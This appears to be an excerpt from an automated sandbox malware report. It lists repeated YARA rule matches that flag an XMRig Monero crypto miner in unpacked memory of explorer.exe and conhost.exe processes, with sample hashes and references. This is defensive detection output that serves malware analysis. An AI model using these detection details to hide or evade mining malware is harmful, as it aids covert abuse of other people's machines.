                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
